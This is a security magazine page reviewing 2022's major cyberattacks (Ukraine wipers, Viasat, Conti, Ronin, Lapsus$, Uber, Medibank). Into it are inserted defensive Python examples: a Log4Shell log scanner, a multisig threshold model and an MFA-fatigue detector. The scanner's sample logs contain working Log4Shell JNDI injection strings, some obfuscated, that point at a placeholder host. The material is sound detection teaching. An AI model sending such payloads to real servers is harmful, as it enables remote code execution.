
Cyber Security

2022 in Review: 10 of the Year’s Biggest Cyberattacks

Written by Phil Muncaster, guest writer at ESET

The past year has seen the global economy lurch from one crisis to another. As COVID-19 finally began to recede in many regions, what replaced it was rising energy bills, soaring inflation and a resulting cost-of-living crisis, some of it spurred by Russia’s invasion of Ukraine. These developments have in turn opened the door to new opportunities for financially motivated and state-backed threat actors.

They have targeted governments, hospitals, cryptocurrency firms and many other organisations with impunity. The average cost of a data breach now stands at nearly $4.4 million, and as long as threat actors continue to achieve successes like those below, we can expect it to rise even higher in 2023.

Here are 10 of the worst cyber incidents of the year, whether for the damage they wrought, their level of sophistication or their geopolitical fallout. The list is in no particular order, but it makes sense to open with the malicious cyber operations that took aim at Ukraine and immediately raised concerns about their ramifications for, and the cyber risks faced by, the wider world.

Ukraine under (cyber)attack: Ukraine’s critical infrastructure has found itself, yet again, in the crosshairs of threat actors. Early in Russia’s invasion, ESET researchers worked closely with CERT-UA on remediating an attack that targeted the country’s grid and involved destructive malware that Sandworm had attempted to deploy against high-voltage electrical substations. The malware, which ESET named Industroyer2 after the infamous Industroyer that the group used to cut power in Ukraine in 2016, speaks the IEC-104 protocol used to command substation equipment. It was deployed in combination with a new variant of the CaddyWiper data wiper, most likely to hide the group’s tracks, slow down incident response and prevent the energy company’s operators from regaining control of their ICS consoles.

More wipers: CaddyWiper was far from the only destructive data wiper discovered in Ukraine just before or in the first few weeks of Russia’s invasion. On February 23rd, ESET telemetry picked up HermeticWiper on hundreds of machines in several organizations in Ukraine. The following day, a second destructive, data-wiping attack against a Ukrainian governmental network started, this time delivering IsaacWiper.

Internet down: Barely an hour before the invasion, a major cyberattack on commercial satellite internet provider Viasat disrupted broadband service for thousands of people in Ukraine and elsewhere in Europe, leaving behind thousands of bricked modems. The attack on Viasat’s KA-SAT network, which exploited a misconfigured VPN appliance to gain access to the network’s management segment, is believed to have been intended to impair the Ukrainian command’s communications in the first hours of the invasion. Its effects were felt far beyond Ukraine’s borders, however, including the loss of remote monitoring for thousands of wind turbines in Germany.

Conti in Costa Rica: A major player in the cybercrime underground this year was the ransomware-as-a-service (RaaS) group Conti. One of its most audacious raids was against the small Central American nation of Costa Rica, where a national emergency was declared after the government branded a crippling attack on its ministries an act of “cyber-terrorism.” The group has since disappeared, although its members are likely to have simply moved on to other projects or rebranded wholesale, as RaaS outfits generally do to avoid scrutiny from law enforcement and governments.

Other ransomware actors were also in action in 2022. A CISA alert from September explained that Iran-affiliated threat actors had compromised a US municipal government and an aerospace company, among other targets, by exploiting the infamous Log4Shell bug in ransomware campaigns, which is not all that common for state-backed entities. Also intriguing was a US government compromise in November that was likewise blamed on Iran: an unnamed Federal Civilian Executive Branch (FCEB) organization was breached, again through Log4Shell in an unpatched VMware Horizon server, and crypto-mining malware was deployed.
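
As an added example (not part of the original article, and not ESET or CISA tooling), the following Python scanner shows the detection side of the Log4Shell campaigns described above. Attackers routinely hid the JNDI lookup behind URL encoding, `${lower:...}`/`${upper:...}` wrappers and the `${name:-default}` default-value trick, so the scanner normalises those before matching rather than grepping for the literal `${jndi:`. The access-log lines are constructed for the example and the addresses are documentation ranges, not real infrastructure.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines for the example (not real traffic).
SAMPLE_LOGS = [
    '10.0.0.5 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [12/Dec/2021:10:01:05 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.7 - - [12/Dec/2021:10:01:09 +0000] "GET /?x=${${lower:j}${upper:n}di:${lower:rmi}://203.0.113.7/b} HTTP/1.1" 404 0 "-" "curl/7.68"',
    '10.0.0.8 - - [12/Dec/2021:10:01:11 +0000] "GET /api HTTP/1.1" 200 12 "-" "%24%7Bjndi%3Adns%3A%2F%2F203.0.113.7%2Fc%7D"',
    '10.0.0.9 - - [12/Dec/2021:10:01:15 +0000] "GET /search?q=${env:HOME} HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

# ${lower:X} / ${upper:X}: Log4j resolves these to X with the case changed, so we
# simply unwrap them; case does not matter because the line is lowercased at the end.
_CASE_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^}$]*)\}", re.IGNORECASE)
# ${name:-default}: an undefined lookup resolves to its default, so ${::-j} and
# ${env:NOPE:-j} both collapse to the letter j.
_DEFAULT_VALUE = re.compile(r"\$\{[^}$]*:-([^}$]*)\}")

JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:")
LOOKUP = re.compile(r"\$\{\s*[a-z]+\s*:")


def normalize(text: str) -> str:
    """Undo URL encoding and Log4j lookup obfuscation until nothing changes."""
    prev = None
    while prev != text:
        prev = text
        text = unquote(text)
        text = _CASE_WRAPPER.sub(lambda m: m.group(1), text)
        text = _DEFAULT_VALUE.sub(lambda m: m.group(1), text)
    return text.lower()


def _payload(norm: str, start: int, end: int) -> str:
    """Slice the matched lookup up to its closing brace (or end of line)."""
    close = norm.find("}", end)
    return norm[start: close + 1 if close != -1 else len(norm)]


def scan(lines):
    """Return one hit per suspicious line: kind 'jndi' for exploit attempts,
    'lookup' for any other ${...:...} lookup that deserves a second look."""
    hits = []
    for number, line in enumerate(lines, 1):
        norm = normalize(line)
        match, kind = JNDI.search(norm), "jndi"
        if match is None:
            match, kind = LOOKUP.search(norm), "lookup"
        if match is None:
            continue
        hits.append({
            "line": number,
            "src": line.split(" ", 1)[0],   # first field of a combined-format line
            "kind": kind,
            "scheme": match.group(1) if kind == "jndi" else None,
            "normalized": _payload(norm, match.start(), match.end()),
        })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(f"line {hit['line']:>2} {hit['kind']:6} {hit['src']:10} {hit['normalized']}")
```

The normalisation loop is the part worth copying: each pass undoes one layer of encoding or one layer of lookup nesting, and it only stops when a pass changes nothing, so doubly URL-encoded or doubly wrapped payloads still end up as a plain `${jndi:...}` string for the final match.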

Ronin Network: Ronin was created by Vietnamese blockchain game developer Sky Mavis to function as an Ethereum sidechain for its Axie Infinity game. In March it emerged that attackers had obtained the private keys of five of the Ronin bridge’s nine validators, enough to meet the bridge’s signing threshold, and used them to forge two withdrawals totalling 173,600 ETH ($592 million) and $25.5 million in USDC. The resulting $618 million theft, at March prices, was the largest ever from a crypto firm. The infamous North Korean group Lazarus has since been linked to the raid. The hermit nation has been traced in the past to thefts worth billions of dollars, used to fund its nuclear and missile programs.
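
The Ronin theft came down to key custody: the bridge released funds on five of nine validator signatures, and the attacker assembled five keys, four from validators run by Sky Mavis itself and one belonging to the Axie DAO. As an added example, not code from Sky Mavis or the Ronin bridge, the Python below models that threshold check, shows the difference between four and five compromised keys, and adds an operator-diversity rule that would reject a quorum dominated by a single operator. Validator IDs, operator names and keys are constructed here, and HMAC-SHA256 stands in for the real on-chain ECDSA signatures.

```python
import hashlib
import hmac
import json
import os
from collections import Counter

NUM_VALIDATORS = 9
THRESHOLD = 5  # signatures required before the bridge releases funds

# Constructed validator set (validator id -> operator). The split, four nodes run by
# one operator, one by a partner DAO and four independent, mirrors the Ronin set-up
# at the time of the theft; the names are placeholders for the example.
OPERATORS = {
    "val0": "SkyMavis", "val1": "SkyMavis", "val2": "SkyMavis", "val3": "SkyMavis",
    "val4": "AxieDAO",
    "val5": "OperatorA", "val6": "OperatorB", "val7": "OperatorC", "val8": "OperatorD",
}
assert len(OPERATORS) == NUM_VALIDATORS

# One private key per validator, generated locally. HMAC-SHA256 stands in for
# ECDSA signing so the example runs with the standard library only.
KEYS = {vid: os.urandom(32) for vid in OPERATORS}


def canonical(withdrawal: dict) -> bytes:
    """Deterministic encoding so every signer signs exactly the same bytes."""
    return json.dumps(withdrawal, sort_keys=True, separators=(",", ":")).encode()


def sign(validator_id: str, withdrawal: dict) -> str:
    return hmac.new(KEYS[validator_id], canonical(withdrawal), hashlib.sha256).hexdigest()


def verify(validator_id: str, signature: str, withdrawal: dict) -> bool:
    return hmac.compare_digest(sign(validator_id, withdrawal), signature)


def bridge_accepts(withdrawal: dict, signatures: dict, max_per_operator=None) -> bool:
    """Release funds only if THRESHOLD distinct validators signed this exact withdrawal.
    max_per_operator, when set, additionally caps how many counted signatures may come
    from validators run by the same operator (the rule Ronin lacked)."""
    valid = {vid for vid, sig in signatures.items()
             if vid in KEYS and verify(vid, sig, withdrawal)}
    if len(valid) < THRESHOLD:
        return False
    if max_per_operator is not None:
        per_operator = Counter(OPERATORS[vid] for vid in valid)
        if per_operator.most_common(1)[0][1] > max_per_operator:
            return False
    return True


def forge(compromised: list, withdrawal: dict) -> dict:
    """The signature set an attacker holding the listed validators' keys can produce."""
    return {vid: sign(vid, withdrawal) for vid in compromised}


if __name__ == "__main__":
    w = {"to": "0xattacker", "amount_eth": 173600, "nonce": 1}
    four = forge(["val0", "val1", "val2", "val3"], w)
    five = forge(["val0", "val1", "val2", "val3", "val4"], w)
    print("4 keys:", bridge_accepts(w, four))
    print("5 keys:", bridge_accepts(w, five))
    print("5 keys, diversity rule:", bridge_accepts(w, five, max_per_operator=2))
```

The point of the diversity check is that a 5-of-9 threshold only protects you if the nine keys are genuinely independent; when one organisation holds four of them, the effective threshold for an attacker who has already compromised that organisation is one more key.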

Lapsus$: Lapsus$ burst onto the scene in 2022 as an extortion group using high-profile data thefts to force payment from its corporate victims, which have included Microsoft, Samsung, Nvidia, Ubisoft, Okta and Vodafone. Its methods include bribing insiders at firms and their contractors, SIM swapping and bombarding targets with MFA prompts. Although the group had been relatively quiet for a while, it re-emerged later in the year with the September hack of Grand Theft Auto developer Rockstar Games. Several alleged members of the group have been arrested in the UK and Brazil.

International Red Cross (ICRC): In January, the ICRC reported a major breach that compromised the personal details of over 515,000 “highly vulnerable” people. Stolen from servers hosted by a Swiss contractor, the data included details of individuals separated from their families by conflict, migration and disaster, missing persons and their families, and people in detention. The ICRC subsequently blamed an unnamed nation-state actor, who got in by exploiting an unpatched authentication-bypass flaw (CVE-2021-40539) in a Zoho ManageEngine ADSelfService Plus installation.

Uber: The ride-hailing giant was famously breached back in 2016, when details on 57 million users were stolen. In September it was reported that a hacker, potentially a member of Lapsus$, had compromised email and cloud systems, code repositories, an internal Slack account and HackerOne tickets. The actor targeted an Uber external contractor, most likely obtaining their corporate password from the dark web and then bombarding them with MFA push notifications until one was approved.
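
The Uber intrusion hinged on a stolen password plus a contractor who eventually approved one of a flood of MFA push prompts. As an added example, not Uber’s detection logic or any vendor’s product, the Python below runs a simple push-fatigue detector over constructed identity-provider events: a burst of denied or timed-out push prompts for one account inside a short window raises an alert, and an approval arriving after that burst escalates it, since that sequence is the signature of a successful fatigue attack. Event shape, timestamps, addresses and thresholds are assumptions chosen for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed MFA push events as (timestamp, user, result, source_ip).
# Not real logs; the addresses are documentation ranges.
SAMPLE_EVENTS = [
    ("2022-09-15T22:01:00", "contractor01", "denied",   "198.51.100.9"),
    ("2022-09-15T22:01:40", "contractor01", "timeout",  "198.51.100.9"),
    ("2022-09-15T22:02:30", "contractor01", "denied",   "198.51.100.9"),
    ("2022-09-15T22:03:10", "contractor01", "denied",   "198.51.100.9"),
    ("2022-09-15T22:04:00", "contractor01", "timeout",  "198.51.100.9"),
    ("2022-09-15T22:05:00", "contractor01", "denied",   "198.51.100.9"),
    ("2022-09-15T22:06:30", "contractor01", "approved", "198.51.100.9"),
    ("2022-09-15T22:03:00", "alice",        "approved", "10.1.2.3"),
    ("2022-09-15T22:10:00", "alice",        "denied",   "10.1.2.3"),
]

REJECTED = {"denied", "timeout"}


def detect_push_fatigue(events, window_minutes=15, min_rejections=5):
    """One alert per account whose rejected push prompts reach min_rejections within
    the window. 'approved_after' marks an approval that lands after the burst but
    still inside the window; that is what escalates the alert to high severity."""
    window = timedelta(minutes=window_minutes)
    by_user = defaultdict(list)
    for ts, user, result, ip in events:
        by_user[user].append((datetime.fromisoformat(ts), result, ip))

    alerts = []
    for user, evs in by_user.items():
        evs.sort()
        rejected = [e for e in evs if e[1] in REJECTED]
        for start, _, _ in rejected:           # try each rejection as a window start
            end = start + window
            burst = [e for e in rejected if start <= e[0] <= end]
            if len(burst) < min_rejections:
                continue
            last_rejection = burst[-1][0]
            approved = any(e[1] == "approved" and last_rejection < e[0] <= end
                           for e in evs)
            alerts.append({
                "user": user,
                "window_start": start.isoformat(),
                "rejections": len(burst),
                "source_ips": sorted({e[2] for e in burst}),
                "approved_after": approved,
                "severity": "high" if approved else "medium",
            })
            break  # report the first qualifying burst per account
    return alerts


if __name__ == "__main__":
    for alert in detect_push_fatigue(SAMPLE_EVENTS):
        print(alert)
```

In production the same logic runs as a scheduled query over the identity provider’s authentication log; the two knobs that matter are the window (long enough to catch a patient attacker, short enough that a user’s normal fumbling does not trip it) and the decision to treat a later approval as an incident rather than as the end of the problem.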

Medibank: All of the Australian health insurance giant’s four million customers had personal data accessed by ransomware actors in an attack that may end up costing the firm US$35 million. Those responsible are believed to be linked to the infamous ransomware-as-a-service (RaaS) outfit REvil (aka Sodinokibi), with compromised privileged credentials responsible for initial access. Those affected now face a potential barrage of follow-on identity fraud attempts.

Whatever happens in 2023, some of the cautionary tales from these 10 major incidents should stand everybody, including CISOs, in good stead. Get your cybersecurity processes and operations right, organize cybersecurity awareness training for all employees, and partner with reputable security companies whose solutions can stand up to the complex methods deployed by threat actors.

Cyber Security

ESET Research Uncovers Iran-Aligned BladedFeline Spying on Iraqi, Kurdish Officials

The Iran-aligned threat group BladedFeline has targeted Kurdish and Iraqi government officials in a recent cyber-espionage campaign, according to ESET researchers. The group deployed a range of malicious tools discovered within the compromised systems, indicating a continued effort to maintain and expand access to high-ranking officials and government organizations in Iraq and the Kurdish region. The latest campaign highlights BladedFeline’s evolving capabilities, featuring two tunneling tools (Laret and Pinar), various supplementary tools, and, most notably, a custom backdoor Whisper and a malicious Internet Information Services (IIS) module PrimeCache, both identified and named by ESET.

Whisper logs into a compromised webmail account on a Microsoft Exchange server and uses it to communicate with the attackers via email attachments. PrimeCache is a malicious IIS module that also serves as a backdoor, and it bears similarities to the RDAT backdoor used by the OilRig Advanced Persistent Threat (APT) group.

Based on these code similarities, as well as on further evidence presented in ESET’s full research blogpost, ESET assesses that BladedFeline is very likely a subgroup of OilRig, an Iran-aligned APT group going after governments and businesses in the Middle East. The initial implants in the latest campaign can be traced back to OilRig. These tools reflect the group’s strategic focus on persistence and stealth within targeted networks.

BladedFeline has consistently worked to maintain illicit access to Kurdish diplomatic officials, while simultaneously exploiting a regional telecommunications provider in Uzbekistan, and developing and maintaining access to officials in the government of Iraq.

ESET Research assesses that BladedFeline is targeting the Kurdish and Iraqi governments for cyberespionage purposes, with an eye toward maintaining strategic access to the computers of high-ranking officials in both governmental entities. The Kurdish diplomatic relationship with Western nations, coupled with the oil reserves in the Kurdistan region, makes it an enticing target for Iran-aligned threat actors to spy on and potentially manipulate. In Iraq, these threat actors are most probably trying to counter the influence of Western governments following the US invasion and occupation of the country.

In 2023, ESET Research discovered that BladedFeline targeted Kurdish diplomatic officials with the Shahmaran backdoor, and previously reported on its activities in ESET APT Activity reports. The group has been active since at least 2017, when it compromised officials within the Kurdistan Regional Government, but is not the only subgroup of OilRig that ESET Research is monitoring. ESET has been tracking Lyceum, also known as HEXANE or Storm-0133, as another OilRig subgroup. Lyceum focuses on targeting various Israeli organizations, including governmental and local governmental entities and organizations in healthcare.

ESET expects that BladedFeline will persist with implant development in order to maintain and expand access within its compromised victim set for cyberespionage.

Cloud

SentinelOne Simplifies Secure Cloud Migrations on AWS

SentinelOne today announced its participation in the Amazon Web Services (AWS) Independent Software Vendor (ISV) Workload Migration Program. This initiative supports AWS Partner Network (APN) members with SaaS offerings on AWS to accelerate and streamline workload migrations.

Through the program, SentinelOne will provide AWS customers with accelerated, secure cloud migration support, leveraging modern AI-powered CNAPP capabilities to ensure rapid and protected transitions. With access to AWS funding, technical resources, and go-to-market support, SentinelOne will help organizations reduce migration timelines and costs while maintaining robust security.

SentinelOne’s Singularity Cloud Security delivers real-time visibility and protection throughout the migration journey—whether from on-premises or another cloud—enabling a secure, seamless transition to AWS.

“Through our participation in the AWS ISV Workload Migration Program, SentinelOne is helping customers accelerate secure cloud migrations with end-to-end protection and visibility,” said Ric Smith, President of Product, Technology, and Operations at SentinelOne. “Whether moving from on-prem or another cloud to AWS, organizations can count on us to deliver the security they need throughout their journey—realizing the performance, speed, agility, and cost benefits of the cloud.”

Singularity Cloud Security combines agentless and agent-based protection for deep visibility, continuous posture management, and real-time threat detection across hybrid and multi-cloud environments. By collaborating with AWS and ecosystem partners, SentinelOne ensures seamless integration into migration projects, helping customers move faster, reduce risk, and scale confidently in the cloud.

Availability: SentinelOne’s solutions are available globally.

Cyber Security

Beyond Blocklists: How Behavioural Intent Analysis Can Safeguard Middle East Businesses from Rising AI-Driven Bot Threats

The Middle East is facing an unprecedented surge in AI-driven bot attacks, with malicious automation now outpacing traditional defenses. Mohammad Ismail, Vice President for EMEA at Cequence Security, warns that legacy tools like IP blocklists and rate limiting are no match for today’s sophisticated threats.

Copyright © 2021 Security Review Magazine. Rysha Media LLC. All Rights Reserved.